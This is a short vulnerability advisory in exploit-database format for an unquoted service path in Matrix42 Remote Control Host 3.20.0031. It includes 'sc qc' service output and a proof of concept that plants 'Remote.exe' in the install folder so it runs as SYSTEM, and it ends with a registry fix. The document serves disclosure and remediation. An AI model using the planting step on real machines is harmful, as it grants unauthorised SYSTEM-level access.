Matrix42 Remote Control Host 3.20.0031 Privilege Escalation

`# Exploit Title: Matrix42 Remote Control Host - Unquoted Path Privilege Escalation  
# Date: 06-05-2016  
# Exploit Author: Roland C. Redl  
# Vendor Homepage: https://www.matrix42.com/  
# Software Link: n/a  
# Version: 3.20.0031  
# Tested on: Windows 7 Enterprise SP1 x64  
# CVE : n/a  
  
1. Description:  
  
>sc qc FastViewerRemoteProxy  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: FastViewerRemoteProxy  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 4 DISABLED  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\Matrix42\Remote Control Host\FastProxy.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : FastViewer Proxyservice  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
>sc qc FastViewerRemoteService  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: FastViewerRemoteService  
TYPE : 110 WIN32_OWN_PROCESS (interactive)  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\Matrix42\Remote Control Host\FastRemoteService.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : FastViewer Remoteservice  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
The unquoted path could potentially allow an authorized but non privileged local user to execute arbitrary code with elevated privileges on the system.  
  
2. Proof of concept:  
  
Copy notepad.exe to "C:\Program Files (x86)\Matrix42\" and rename it to "Remote.exe".  
Restart the service or the machine and Remote.exe will start with SYSTEM privileges.  
  
3. Solution:   
  
To fix it manually, open regedit, browse to HKLM\SYSTEM\CurrentControlSet\services and add the quotes to the ImagePath value of the relevant service.  
  
`